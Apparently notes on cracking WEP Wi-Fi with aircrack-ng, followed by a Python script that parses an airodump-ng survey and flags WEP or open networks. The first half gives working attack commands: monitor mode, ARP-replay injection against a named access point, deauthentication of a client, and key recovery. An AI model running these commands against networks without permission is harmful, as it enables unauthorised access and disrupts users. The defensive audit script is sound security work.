# airmon-ng start eth1
Interface       Chipset         Driver
eth1            Centrino b/g    ipw2200 (monitor mode enabled)

root@laptopdth:/var/tmp# ifconfig eth1
eth1      Link encap:UNSPEC  HWaddr 00-16-6F-8D-11-F2-48-A3-00-00-00-00-00-00-00-00

# airodump-ng eth1
Write down the ESSID, channel # and BSSID, e.g.:

 BSSID              PWR  Beacons  #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
 00:03:2F:0A:49:B5  218      850     240    2   6  22  WEP  WEP         openwrt
 00:1A:92:68:61:AD  176       64       0    0   4  48  WEP  WEP         Carport

 BSSID              STATION            PWR  Rate   Lost  Packets  Probes
 00:03:2F:0A:49:B5  00:10:C6:55:12:23  218  11-11    75      234

# start logging in one terminal:
# airodump-ng --ivs -c [channel eg 6] -w [filename] -i eth1

# insert fake traffic in other terminal
# aireplay-ng --arpreplay -b [macaddress -AP eg 00:03:2F:0A:49:B5] -h [local macaddress of wifi card eg 00:16:6F:8D:11:F2] eth1

# At first, it will only read packets, and say 0 ARP requests and 0 packets sent.
# Just wait a minute or two and it will start sending packets in large quantities.
# If it returns text that says it has been deauthorized, press Ctrl+C and run the command again.

To confuse even more: send deauth commands:
aireplay-ng -e openwrt -a 00:03:2F:0A:49:B5 -c 00:10:C6:55:12:23 --deauth 10 eth1

To find key:
aircrack-ng -f 4 -n [128/64] [filename]
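
The airodump-ng listing above, read from the defender's side: an added example (not part of the original notes) that parses the access point table of a site survey and flags networks still advertising WEP or no encryption, so they can be moved to WPA2/WPA3. The function names are hypothetical, and the parser assumes the column layout shown on this page (BSSID, six counters, ENC, optional CIPHER and AUTH, ESSID).

```python
import re

MAC = re.compile(r"^(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")
CIPHERS = {"WEP", "WEP40", "WEP104", "TKIP", "CCMP", "WRAP"}
AUTHS = {"OPN", "SKA", "PSK", "MGT"}

# Constructed sample: the listing from the notes above, one row per line.
SAMPLE = """\
BSSID              PWR  Beacons  #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
00:03:2F:0A:49:B5  218  850      240    2    6   22  WEP  WEP         openwrt
00:1A:92:68:61:AD  176  64       0      0    4   48  WEP  WEP         Carport

BSSID              STATION            PWR  Rate   Lost  Packets  Probes
00:03:2F:0A:49:B5  00:10:C6:55:12:23  218  11-11  75    234
"""

def parse_ap_table(text):
    """Return one dict per access point row; header and station rows are skipped."""
    aps = []
    for line in text.splitlines():
        tok = line.split()
        # AP rows: a BSSID, six counters, then ENC. Station rows carry a
        # second MAC (or "(not associated)") in column two.
        if len(tok) < 8 or not MAC.match(tok[0]):
            continue
        if MAC.match(tok[1]) or tok[1].startswith("("):
            continue
        rest = tok[8:]
        # CIPHER and AUTH can be blank (AUTH is blank in the listing above),
        # so accept them only when the token is a known value.
        cipher = rest.pop(0) if rest and rest[0] in CIPHERS else ""
        auth = rest.pop(0) if rest and rest[0] in AUTHS else ""
        aps.append({"bssid": tok[0], "channel": int(tok[5]), "enc": tok[7],
                    "cipher": cipher, "auth": auth, "essid": " ".join(rest)})
    return aps

def weak_networks(aps):
    """APs whose ENC column shows WEP (including 'WEP?') or OPN."""
    return [ap for ap in aps if ap["enc"].startswith("WEP") or ap["enc"] == "OPN"]

if __name__ == "__main__":
    for ap in weak_networks(parse_ap_table(SAMPLE)):
        name = ap["essid"] or "<hidden>"
        print(f'{name} ({ap["bssid"]}) ch {ap["channel"]}: {ap["enc"]}')
```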